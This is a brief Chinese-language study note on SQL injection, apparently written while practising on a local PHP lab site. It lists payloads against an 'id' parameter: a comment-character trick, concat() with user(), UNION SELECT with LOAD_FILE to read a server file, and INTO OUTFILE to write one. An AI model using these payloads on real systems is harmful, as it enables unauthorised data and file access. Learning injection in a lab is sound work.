学习笔记---Sql注入注释符
学习笔记—Sql注入注释符
注释符:
http://127.0.0.1/7-27/index.php?id=1 --+ ss
Concat()
select concat(‘aa’,‘bb’);
select concat(‘aa’,user());
select concat(’[’,user(),’]’);
http://127.0.0.1/7-27/index.php
load_file
?id=1 UNION SELECT 1,2,3,LOAD_FILE(“D:/phpstudy_pro/WWW/7-27/123.php”)
参考网址:https://blog.****.net/zx520113/article/details/107056013
into outfile()
http://127.0.0.1/7-27/index.php
?id=1 UNION SELECT 1,2,3,4 into outfile “D:/phpstudy_pro/WWW/7-27/456.txt”
了解更多请关注下列公众号: